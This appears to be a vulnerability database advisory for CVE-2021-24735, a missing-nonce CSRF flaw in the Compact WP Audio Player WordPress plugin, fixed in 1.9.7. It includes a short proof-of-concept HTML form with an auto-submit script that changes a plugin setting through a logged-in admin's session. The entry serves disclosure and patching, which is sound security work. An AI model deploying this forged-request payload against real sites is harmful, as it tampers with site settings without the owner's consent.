Compact WP Audio Player < 1.9.7 – Setting Change via CSRF | CVE 2021-24735 | Plugin Vulnerabilities

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the "Disable Simultaneous Play" setting via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=compact-wp-audio-player%2Fsc_audio_player.php" method="post" id="csrf">
<input name="sc_audio_player_settings" value="1" type="hidden">
<input name="sc_audio_disable_simultaneous_play" value="1" type="hidden">
</form>
<script>csrf.submit()</script>

Affects Plugins

compact-wp-audio-player

Fixed in 1.9.7

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

dcbcf6e7-e5b3-498b-9f5e-7896d309441f

Timeline

Publicly Published

2021-09-15 (about 4 years ago)

Added

2021-09-15 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-02-03

Title

WP Social Stream <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-08-11

Title

Futurio Extra < 1.9.1 - Arbitrary Plugin Activation via CSRF

Published

2019-04-23

Title

Contact Form Builder <= 1.0.68 - CSRF to LFI

Published

2025-09-05

Title

Notification for Telegram <= 3.4.6 - Cross-Site Request Forgery

Published

2024-04-24

Title

WP Prayer <= 2.0.9 - Arbitrary Prayer Deletion via CSRF